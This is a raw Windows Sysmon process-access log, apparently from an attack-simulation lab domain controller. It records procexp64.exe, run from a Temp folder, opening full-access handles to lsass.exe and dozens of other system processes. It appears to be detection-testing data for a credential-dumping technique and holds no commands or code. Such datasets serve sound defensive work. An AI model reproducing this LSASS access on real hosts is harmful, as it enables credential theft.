15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784493Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784492Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784491Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784490Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784489Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784488Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784487Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784486Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784485Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784484Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:39.003{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784717Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784716Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784715Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784714Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784713Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784712Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784711Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784710Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784709Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784708Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784707Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784706Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784705Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784704Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784703Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784702Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784701Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784700Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784699Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784698Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784697Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784696Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784695Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784694Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784693Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784692Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784691Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 